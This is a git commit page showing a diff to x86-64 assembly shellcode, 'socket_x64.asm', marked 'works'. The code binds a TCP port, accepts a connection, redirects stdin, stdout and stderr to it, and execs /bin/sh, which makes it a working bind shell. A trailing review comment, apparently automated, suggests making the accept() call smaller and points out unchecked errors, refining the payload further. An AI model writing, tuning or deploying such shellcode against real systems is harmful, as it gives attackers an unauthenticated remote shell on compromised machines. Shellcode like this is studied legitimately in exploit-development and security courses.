author | toni <matzeton@googlemail.com> | 2014-11-18 17:19:31 +0100 |
---|---|---|
committer | toni <matzeton@googlemail.com> | 2014-11-18 17:19:31 +0100 |
commit | 5c26ae8af99016bcbb6fae633367ab7100521c6d (patch) | |
tree | 8623e19229c2ee8dac460bd658456719a2a0de99 /shellcode/socket_x64.asm | |
parent | 8c116d25fd1351f1b896584629b9d388446fc544 (diff) |
- socket_x64 shellcode works
Diffstat (limited to 'shellcode/socket_x64.asm')
-rw-r--r-- | shellcode/socket_x64.asm | 43 |
1 files changed, 22 insertions, 21 deletions
diff --git a/shellcode/socket_x64.asm b/shellcode/socket_x64.asm
index 131fefa..1ec36b0 100644
--- a/shellcode/socket_x64.asm
+++ b/shellcode/socket_x64.asm
@@ -8,66 +8,67 @@ xor rdx,rdx
 mov dil,0x2 ; AF_INET
 mov sil,0x1 ; SOCK_STREAM
 mov al,0x29 ; socket() syscall
-int 0x80 ; let the kernel do the stuff
+syscall
 mov rdi,rax ; save sockfd (used as argument for future calls)
 ; bind()
 xor rax,rax
-xor rdi,rdi
-xor rsi,rsi
 push rax ; sockaddr_in: in_addr = 0
 push word 0x11AA ; sockaddr_in: tcp port
 push word 0x2 ; sockaddr_in: sa_family = AF_INET
 mov rsi,rsp ; save stack pointer (pointer to struct sockaddr_in)
-mov rdx,0x10 ; addrlen
+mov dl,0x10 ; addrlen
 mov al,0x31 ; bind() syscall
-int 0x80 ; kernel mode
+syscall
 ; listen()
 xor rax,rax
 xor rsi,rsi ; zero rsi (arg2 -> backlog)
 mov al,0x32 ; listen() syscall
-int 0x80
+syscall
 ; accept()
 xor rax,rax
 push rax ; sockaddr_in: in_addr = 0
-push word ax ; sockaddr_in: tcp_port = 0
+push word 0x11AA ; sockaddr_in: tcp_port = 0
 push word 0x2 ; sockaddr_in: sa_family = AF_INET
 mov rsi,rsp ; save stack pointer (pointer to struct sockaddr_in)
+push 0x10 ; addr_len
+mov rdx,rsp ; pointer to upeer_addrlen
 mov al,0x2B ; accept() syscall
-int 0x80
+syscall
+
+mov rdi,rax ; save clientfd
 ; dup2()
-xor rcx,rcx
-mov cl,0x3 ; loop count
+xor rdx,rdx
+mov dl,0x3
 dupes:
-xor rsi,rsi
-dec cl ; loop var
-mov rsi,rcx ; loop var -> newfd
+mov rsi,rdx
+dec rsi
 xor rax,rax
-mov al,0x21 ; dup2() syscall
-int 0x80
-inc cl
-loop dupes
+mov al,0x21
+syscall
+dec dl
+jnz dupes
 ; exec
 mov rax,0x68732f6e69622f2f ; string 'hs/nib//'
 push rax ; push the string onto the stack
-mov rdi,rsp ; arg1 = pointer to string
 xor rax,rax
+mov byte [rsp + 8],al ; null-terminate the string
+mov rdi,rsp ; arg1 = pointer to string
 push rax ; arg2 = null
 mov rsi,rsp
 push rax ; arg3 = null
 mov rdx,rsp
-mov byte [esp + 8],al ; null-terminate the string
 mov al,0x3b ; exec() syscall
-int 0x80
+syscall
 ; exit()
 xor rax,rax
 xor rdi,rdi
 mov dil,0x42 ; return code (66d)
 mov al,0x3c ; exit() syscall
-int 0x80
+syscall
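Review bot: The new `push word 0x11AA ; sockaddr_in: tcp_port = 0` in the accept() block documents a value it no longer has, and the 12-byte sockaddr it belongs to plus the added `push 0x10` / `mov rdx,rsp` addrlen slot are never read after the call, so the buffer only costs bytes and invites exactly this kind of stale comment. accept(2) takes NULL for both pointers, so the seven lines from `xor rax,rax` to `mov rdx,rsp` can become `xor rax,rax` / `xor rsi,rsi ; addr = NULL, peer address is never used` / `xor rdx,rdx ; addrlen = NULL`, followed by the existing `mov al,0x2B`. The added `mov rdi,rax ; save clientfd` also takes the return value unchecked, so a failed accept() would leave -errno in rdi, every dup2() in the loop would fail on a bad oldfd, and /bin/sh would still be exec'd on the listener's inherited descriptors; that is a common size trade-off in shellcode but should be stated, e.g. `; no error check: a negative (-errno) return still falls through to the dup2/exec path`. The listening socket is likewise never closed before execve, so the spawned shell inherits it. The hunk begins at file line 8, so the zeroing of rax/rdi/rsi that `mov dil,0x2` / `mov sil,0x1` / `mov al,0x29` rely on lies outside it.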